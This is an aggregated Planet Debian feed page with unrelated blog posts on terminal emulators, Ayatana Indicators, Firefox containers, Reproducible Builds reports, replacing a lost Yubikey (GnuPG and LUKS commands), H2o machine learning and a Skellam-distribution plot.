A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only a Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Antoine Beaupré https://anarc.at/tag/debian-planet/ pages tagged debian-planet

The subjectification of a racial group

Planet Debian - Pre, 30/03/2018 - 12:13pd

In the philosophy department the other day we were discussing race-based sexual preferences. As well as considering the cases in which this is ethically problematic, we were trying to determine cases in which it might be okay.

A colleague suggested that a preference with the following history would not be problematic. There is a culture with which he feels a strong affiliation, having spent time living in this culture and having a keen interest in various aspects of that culture, such as its food. As a result, he is more likely, on average, to find himself sexually attracted to someone from that culture—he shares something with them. And since almost all members of that culture are of a particular racial group, that means he is more likely to find himself sexually attracted to someone of that race than to other races, ceteris paribis.

The cultural affiliation is something good. The sexual preference is then an ethically neutral side effect of that affiliation. My colleague suggested a name for the process which is responsible for the preference: he has subjectified his relationship with the culture. Instead of objectifying members of that group, as happens with problematic race-based sexual preferences, he has done something which counts as the opposite.

I am interested in thinking more about the idea of subjectification.

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

Starting the Ayatana Indicators Transition in Debian

Planet Debian - Enj, 29/03/2018 - 3:03md

This is to make people aware and inform about an ongoing effort to replace Indicators in Debian (most people know the concept from Ubuntu) by a more generically developed and actively maintained fork: Ayatana Indicators.

TL;DR;

In Debian, we will soon start sending out patches to SNI supporting applications via Debian's BTS (and upstream trackers, too, probably), that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator.

Status of the work being done is documented here: https://wiki.debian.org/Ayatana/IndicatorsTransition

Why Ayatana Indicators

The fork is currently pushed forward by the Debian and Ubuntu MATE packaging team.

The Indicators concept has originally been documented by Canonical, find your entry point in the readings here [1,2].

Some great work and achievement was done around Ubuntu Indicators by Canonical Ltd. and the Indicators concept has always been a special identifying feature of Ubuntu. Now with the switch to GNOMEv3, the future of Indicators in Ubuntu is uncertain. This is where Ayatana Indicators come in...

The main problem with Ubuntu Indicators today (and ever since) is (has been): they only work properly on Ubuntu, mostly because of one Ubuntu-specific patch against GTK-3 [3].

In Ayatana Indicators (speaking with my upstream hat on now), we are currently working on a re-implementation of the rendering part of the indicators (using GTK's popovers rather then menushells), so that it works on vanilla GTK-3. Help from GTK-3 developers is highly welcome, in case you feel like chiming in.

Furthermore, the various indicator icons in Ubuntu (-session, -power, -sound, etc. - see below for more info) have been targetted more and more for sole usage with the Unity 7 and 8 desktop environments. They can be used with other desktop environments, but are likely to behave quite agnostic (and sometimes stupid) there.

In Ayatana Indicators, we are working on generalizing the functionality of those indicator icon applications and make them more gnostic on other desktop environments.

Ayatana Indicators as an upstream project will be very open to contributions from other desktop environment developers that want to utilize the indicator icons with their desktop shell, but need adaptations for their environment. Furthermore, we want to encourage Unity 7 and Unity 8 developers to consider switching over (and getting one step further with the goal of shipping Unity on non-Ubuntu systems). With the Unity 8 maintainers (the people from UBports / Ubuntu Touch) first discussion exchanges have taken place.

The different Components of Ayatana Indicators The 'indicator-renderer' Applets

Theses are panel plugins mostly, that render the system tray icons and menus (and widgets) defined by indicator aware applications. They normally come with your desktop environment (if it supports indicators).

Letting the desktop environment render the system tray itself assures that the indicator icons (i.e. the desktop system tray) looks just like the rest of the desktop shell. With the classical (xembed based) system tray (or notification) areas, all applications render their icon and menus themselves, which can cause theming problems and a11y issues and more.

Examples of indicator renderers are: mate-indicator-applet, budgie-indicator-applet, xfce4-indicator-pluign, etc.

Shared Library: Rendering and Loading of Indicators

The Ayatana Indicators project currently only provides a rendering shared lib for GTK-2 and GTK-3 based applications. We still need to connect better with the Qt-world.

The rendering library (used by the above renderers) is libayatana-indicator.

This library supports:

  • loading and rendering of old style indicators
  • loading and rendering of NG indicators

The libayatana-indicator library also utilizes a variety of versatile GTK-3 widget defined in another shared library: aytana-ido.

Ayatana Indicator Applets

The Ayatana Indicators project continues and generalizes various indicator icon applications that are not applications by themselves really, but more like system / desktop control elements:

  • ayatana-indicator-session (logout, lock screen, user guides, etc.)
  • ayatana-indicator-power (power management)
  • ayatana-indicator-sound (sound and multimedia control)
  • ayatana-indicator-datetime (clock, calendar, evolution-data-server integration)
  • ayatana-indicator-notifications (libnotify collector of system messages)
  • ayatana-indicator-printers (interact with CUPS print jobs and queues)

These indicators are currently under heavy re-development. The current effort in Ayatana Indicators is to make them far more generic and usable on all desktop environments that want to support them. E.g. we recently added XFCE awareness to the -session and the -power indicator icons.

One special indicator icon is the Ayatana Indicator Application indicator. It provides SNI support to third-party applications (see below). For the desktop applet, it appears just like any of the other above named indicators, but it opens the door to the world of SNI supporting applications.

One available and easy-to-install test case in Debian buster for indicator icons provided by the Ayatana Indicators project is the arctica-greeter package. The icons displayed in the greeter are Ayatana Indicators.

Ayatana AppIndicator API

The Ayatana AppIndicator API is just one way of talking to an SNI DBus service. The implementation is done in the shared lib 'libayatana-appindicator'. This library provides an easy to implement API that allows GTK-2/3 applications to create an indicator icon in a panel with an indicator renderer added.

In the application, the developer creates a generic menu structure and defines one or more icons for the system tray (more than one icon: only one icon is shown (plus some text, if needed), but that icon may changed based on the applet's status). This generic menu is sent to a DBus interface (org.kde.StatusNotifier). Sometimes, people say, that such applications have SNI support (StatusNotifier Interface support).

The Ayatana Indicators project offers Ayatana AppIndicator to GTK-3 developers (and GTK-2, but well...). Canonical implemented bindings for Python2, Perl, GIR, Mono/CLI and we continue to support these as long as it makes sense.

The nice part of Ayatana AppIndicator shared library is: if a desktop shell does not offer the SNI service, then it tries to fall back to the xembed-way of adding system tray icons to your panel / status bar.

In Debian, we will start sending out patches too SNI supporting applications soon, that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator. The cool part of this is, you can convert your GTK-3 application from Ubuntu AppIndicator to Ayatana AppIndicator and use it on top of any(!) SNI implementation, be it an applet based on Ubuntu Indicators, based on Ayatana Indicators or some other implementation, like the vala-sntray-applet or SNI support in KDE.

Further Readings

Some more URLs for deeper reading...

You can also find more info on my blog: https://sunweavers.net

References sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

food, consumer experience and Joshi Wadewala

Planet Debian - Enj, 29/03/2018 - 9:29pd

For a while now, I have been looking at various options of how food quality experience is checked by various people. The only proper or official authority is FSSAI but according to CAG and quartz own web report FSSAI has to go a long way.

The reasons I share this is over the years I have mentioned about how Joshi Wadewala has managed to outdo what others could also have done. But lately, it seems the staff and the owners have grown lax and arrogant about the quality of food and service they provide. For instance under FSSAI it is written under labeling –

Labelling

It is mandatory that every package of food intended for sale should carry a label that bears all the information required under FSS (Packaging and Labelling) Regulation, 2011. Food package must carry a Label with the following information :

Common name of the Product.
Name and address of the product’s Manufacturer
Date of Manufacture
Ingredient List with additives
Nutrition Facts
Best before/ Expires on
Net contents in terms of weight, measure or count.
Packing codes/Batch number
Declaration regarding vegetarian or non-vegetarian
Country of origin for imported food

Also many a times their fresh food is either not fresh or not cooked properly. This has been happening for couple of weeks now. I have to point out that they are not the only ones although this is a proper shop, not a pavement dweller per-se.

I did file my concern with FSSAI but I highly doubt any action will be taken although it is a public safety issue, health issue but as biggies are never caught then he’s a smallish-time operator.

It is also a concern as my mother has no teeth and I was diagnosed with convulsive seizures last year which prevented me from attending debconf last year. I was in hospital for a period of 3 months.

I have stopped going to the establishment as there are others who are better at receiving feedback and strive to being better.

Disclaimer – All the photos shared are copyright zomato.com

I have also no idea if GST is paid or not as you do not get any receipts for your purchases which is also one of the basic consumer right. They just have one slip which you get when you do your purchase and have to hand it over for either take-away or getting food.

They do have a bill book but that is for bulk purchases only.

shirishag75 https://flossexperiences.wordpress.com #planet-debian – Experiences in the community

Limit personal data exposure with Firefox containers

Planet Debian - Mër, 28/03/2018 - 8:44md

There was some noise recently about the massive amount of data gathered by Cambridge Analytica from Facebook users. While I don't use Facebook myself, I do use Google and other services which are known to gather a massive amount of data, and I obviously know a lot of people using those services. I also saw some posts or tweet threads about the data collection those services do.

Mozilla recently released a Firefox extension to help users confine Facebook data collection. This addon is actually based on the containers technology Mozilla develops since few years. It started as an experimental feature in Nightly, then as a test pilot experiment, and finally evolved into a fully featured extension called Multi-Account containers. A somehow restricted version of this is even included directly in Firefox but you don't have the configuration window without the extension and you need to configure it manually with about:config.

Basically, containers separate storage (cookies, site preference, login session etc.) and enable an user to isolate various aspect of their online life by only staying logged to specific websites in their respective containers. In a way it looks like having a separate Firefox profile per website, but it's a lot more usable daily.

I use this extension massively, in order to isolate each website. I have one container for Google, one for Twitter, one for banking etc. If I used Facebook, I would have a Facebook container, if I used gmail I would have a gmail container. Then, my day to day browsing is done using the “default” container, where I'm not logged to any website, so tracking is minimal (I also use uBlock origin to reduce ads and tracking).

That way, my online life is compartmentalized/containerized and Google doesn't always associate my web searches to my account (I actually usually use DuckDuckGo but sometimes I do a Google search), Twitter only knows about the tweets I read and I don't expose all my cookies to every website.

The extension and support pages are really helpful to get started, but basically:

  • you install the extension from the extension page
  • you create new containers for the various websites you want using the menu
  • when you open a new tab you can opt to open it in a selected container by long pressing on the + button
  • the current container is shown in the URL bar and with a color underline on the current tab
  • it's also optionally possible to assign a website to a container (for example, always open facebook.com in the Facebook container), which can help restricting data exposure but might prevent you browsing that site unidentified

When you're inside the container and you want to follow a link, you can get out of the container by right clicking on the link, select “Open link in new container tab” then select “no container”. That way Facebook won't follow you on that website and you'll start fresh (after the redirection).

As far as I can tell it's not yet possible to have disposable containers (which would be trashed after you close the tab) but a feature request is open and another extension seems to exist.

In the end, and while the isolation from that extension is not perfect, I really suggest Firefox users to give it a try. In my opinion it's really easy to use and really helps maintaining healthy barriers on one's online presence. I don't know about an equivalent system for Chromium (or Safari) users but if you know about it feel free to point it to me.

A French version of this post is also available here just in case.

Yves-Alexis corsac@debian.org Corsac.net - Debian

Reproducible Builds: Weekly report #152

Planet Debian - Mar, 27/03/2018 - 11:33md

Here's what happened in the Reproducible Builds effort between Sunday March 18 and Saturday March 24 2018:

Packages reviewed and fixed, and bugs filed diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This week, version 92 was uploaded to unstable by Chris Lamb. It included contributions already covered by posts in previous weeks as well as new ones from:

reprotest development

reprotest is our tool to build software and check it for reproducibility.

trydiffoscope development

trydiffoscope is a lightweight command-line tool to the try.diffoscope.org web-based version of diffoscope.

Reviews of unreproducible packages

88 package reviews have been added, 109 have been updated and 18 have been removed in this week, adding to our knowledge about identified issues.

A random_order_in_javahelper_manifest_files toolchain issue was added by Chris Lamb and the timestamps_in_pdf_generated_by_inkscape toolchain issue was also updated with a URI to the upstream discussion.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (66)
  • Jeremy Bicha (1)
  • Michael Olbrich (1)
  • Ole Streicher (1)
  • Sebastien KALT (1)
  • Thorsten Glaser (1)
Misc.

This week's edition was written by Bernhard M. Wiedemann, Chris Lamb & Holger Levsen & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Replacing a lost Yubikey

Planet Debian - Mër, 14/03/2018 - 7:05pd

Some weeks ago I lost my purse with everything in there, from residency card, driving license, credit cards, cash cards, all kind of ID cards, and last but not least my Yubikey NEO. Being Japan I did expect that the purse will show up in a few days, most probably the money gone but all the cards intact. Unfortunately not this time. So after having finally reissued most of the cards, I also took the necessary procedures concerning the Yubikey, which contained my GnuPG subkeys, and was used as second factor for several services (see here and here).

Although the GnuPG keys on the Yubikey are considered safe from extraction, I still decided to revoke them and create new subkeys – one of the big advantage of subkeys, one does not start at zero but just creates new subkeys instead of running around trying to get signatures again.

Other things that have to be made is removing the old Yubikey from all the services where it has been used as second factor. In my case that were quite a lot (Google, Github, Dropbox, NextCloud, WordPress, …). BTW, you have a set of backup keys saved somewhere for all the services you are using, right? It helps a lot getting into the system.

GnuPG keys renewal

To remind myself of what is necessary, here are the steps:

  • Get your master key from the backup USB stick
  • revoke the three subkeys that are on the Yubikey
  • create new subkeys
  • install the new subkeys onto a new Yubikey, update keyservers

All of that is quite straight-forward: Use gpg --expert --edit-key YOUR_KEY_ID, after this you select the subkey with key N, followed by a revkey. You can select all three subkeys and revoke them at the same time: just type key N for each of the subkeys (where N is the index starting from 0 of the key).

Next create new subkeys, here you can follow the steps laid out in the original blog. In the same way you can move them to a new Yubikey Neo (good that I bought three of them back then!).

Last but not least you have to update the key-servers with your new public key, which is normally done with gpg --send-keys (again see the original blog).

The most tricky part was setting up and distributing the keys on my various computers: The master key remains as usual on offline media only. On my main desktop at home I have the subkeys available, while on my laptop I only have stubs pointing at the Yubikey. This needs a bit of shuffling around, but should be obvious somehow when looking at the previous blogs.

Full disk encryption

I had my Yubikey also registered as unlock device for the LUKS based full disk encryption. The status before the update was as follows:

$ cryptsetup luksDump /dev/sdaN Version: 1 Cipher name: aes .... Key Slot 0: ENABLED ... Key Slot 1: DISABLED Key Slot 2: DISABLED Key Slot 3: DISABLED Key Slot 4: DISABLED Key Slot 5: DISABLED Key Slot 6: DISABLED Key Slot 7: ENABLED ...

I was pretty sure that the Slot for the old Yubikey was Slot 7, but I wasn’t sure. So I first registered the new Yubikey in slot 6 with

yubikey-luks-enroll -s 6 -d /dev/sdaN

and checked that I can unlock during boot using the new Yubikey. Then I cleared the slot information in slot 7 with

cryptsetup luksKillSlot /dev/sdaN 7

and again made sure that I can boot using my passphrase (in slot 0) and the new Yubikey (in slot6).

TOTP/U2F second factor authentication

The last step was re-registering the new Yubikey with all the favorite services as second factor, removing the old key on the way. In my case the list comprises several WordPress sites, GitHub, Google, NextCloud, Dropbox and what else I have forgotten.

Although this is the nearly worst case scenario (ok, the main key was not compromised!), everything went very smooth and easy, to my big surprise. Even my Debian upload ability was not interrupted considerably. All in all it shows that having subkeys on a Yubikey is a very useful and effective solution.

Norbert Preining https://www.preining.info/blog There and back again

Playing with water

Planet Debian - Mër, 14/03/2018 - 5:00pd

I'm currently taking a machine learning class and although it is an insane amount of work, I like it a lot. I initially had planned to use R to play around with the database I have, but the teacher recommended I use H2o, a FOSS machine learning framework.

I was a bit sceptical at first since I'm already pretty good with R, but then I found out you could simply import H2o as an R library. H2o replaces most R functions by its own parallelized ones to cut down on processing time (no more doParallel calls) and uses an "external" server you have to run on the side instead of running R calls directly.

I was pretty happy with this situation, that is until I actually started using H2o in R. With the huge database I'm playing with, the library felt clunky and I had a hard time doing anything useful. Most of the time, I just ended up with long Java traceback calls. Much love.

I'm sure in the right hands using H2o as a library could have been incredibly powerful, but sadly it seems I haven't earned my black belt in R-fu yet.

I was pissed for at least a whole day - not being able to achieve what I wanted to do - until I realised H2o comes with a WebUI called Flow. I'm normally not very fond of using web thingies to do important work like writing code, but Flow is simply incredible.

Automated graphing functions, integrated ETA when running resource intensive models, descriptions for each and every model parameters (the parameters are even divided in sections based on your familiarly with the statistical models in question), Flow seemingly has it all. In no time I was able to run 3 basic machine learning models and get actual interpretable results.

So yeah, if you've been itching to analyse very large databases using state of the art machine learning models, I would recommend using H2o. Try Flow at first instead of the Python or R hooks to see what it's capable of doing.

The only downside to all of this is that H2o is written in Java and depends on Java 1.7 to run... That, and be warned: it requires a metric fuckton of processing power and RAM. My poor server struggled quite a bit even with 10 available cores and 10Gb of RAM...

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau

Reproducible Builds: Weekly report #149

Planet Debian - Mër, 07/03/2018 - 4:21pd

Here's what happened in the Reproducible Builds effort between Sunday February 25 and Saturday March 3 2018:

diffoscope development

Version 91 was uploaded to unstable by Mattia Rizzolo. It included contributions already covered by posts of the previous weeks as well as new ones from:

In addition, Juliana — our Outreachy intern — continued her work on parallel processing; the above work is part of it.

reproducible-website development Packages reviewed and fixed, and bugs filed

An issue with the pydoctor documentation generator was merged upstream.

Reviews of unreproducible packages

73 package reviews have been added, 37 have been updated and 26 have been removed in this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (46)
  • Jeremy Bicha (4)
Misc.

This week's edition was written by Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Skellam distribution likelihood

Planet Debian - Mar, 06/03/2018 - 10:37md

I wondered if it was possible to make a ranking system based on the Skellam distribution, taking point spread as the only input; first step is figuring out what the likelihood looks like, so here's an example for k=4 (ie., one team beat the other by four goals):

It's pretty, but unfortunately, it shows that the most likely combination is µ1 = 0 and µ2 = 4, which isn't really that realistic. I don't know what I expected, though :-)

Perhaps it's different when we start summing many of them (more games, more teams), but you get into too high dimensionality to plot. If nothing else, it shows that it's hard to solve symbolically by looking for derivatives, as the extreme point is on an edge, not on a hill.

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Faqet

Subscribe to AlbLinux agreguesi